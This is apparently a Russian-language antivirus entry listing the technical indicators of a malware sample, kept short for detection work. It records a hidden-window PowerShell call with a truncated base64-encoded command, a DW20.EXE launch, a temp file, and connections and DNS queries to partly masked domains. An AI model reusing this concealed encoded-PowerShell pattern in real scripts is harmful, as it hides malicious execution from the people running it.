Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGsAYgBtAGQAawBsAGwAegBtAHUAaAB5AD0AJwBUAHAAcQBhAGEAdQBtAHcAdQAnADsAJABOAGwAcQB2AG0AeABiAGcAIAA9ACAAJwA5ADEAOQAnADsAJABYAHcAbABxAGQAYgBiAHoAYQA9ACcAWgBjAGkAeABnAGsAagBmAG4AdwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\962479.cvr
- 'ar##63.com':80
- DNS ASK le####grotech.com
- DNS ASK em###mes.com
- DNS ASK se##.#nfoavisos.com
- DNS ASK ar##63.com
- DNS ASK yo###plant.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGsAYgBtAGQAawBsAGwAegBtAHUAaAB5AD0AJwBUAHAAcQBhAGEAdQBtAHcAdQAnADsAJABOAGwAcQB2AG0AeABiAGcAIAA9ACAAJwA5ADEAOQAnADsAJABYAHcAbABxAGQAYgBiAHoAYQA9ACcAWgBjAGkAeABnAGsAagBmAG4AdwA...' (со скрытым окном)